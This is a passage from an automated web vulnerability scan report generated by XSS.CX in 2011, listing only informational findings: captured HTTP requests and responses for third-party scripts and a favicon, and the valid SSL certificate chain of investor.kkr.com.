!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:01 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:01 GMT
Pragma: no-cache
Content-Length: 4401
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...

29.2. http://lfov.net/webrecorder/g/chimera.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/g/chimera.js

Request

Response

29.3. http://lfov.net/webrecorder/js/listen.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lfov.net
Path:	/webrecorder/js/listen.js

Request

Response

29.4. https://webmail-us.mimecast.com/favicon.ico previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://webmail-us.mimecast.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"1406-1297546324000"
Last-Modified: Sat, 12 Feb 2011 21:32:04 GMT
Content-Length: 1406
Date: Thu, 12 May 2011 12:34:18 GMT

..............h.......(....... ...................................................oVE..fJ.........[F6.....'
....y.....vbP.[>$.\C...}m.........fJ7.E...:.......~dQ.....;...jF..2...3...N*................
...[SNIP]...

30. SSL certificate previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://investor.kkr.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	INVESTOR.KKR.COM
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Feb 17 18:00:00 CST 2011
Valid to:	Sun Feb 17 17:59:59 CST 2013

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Thu May 12 08:15:19 CDT 2011.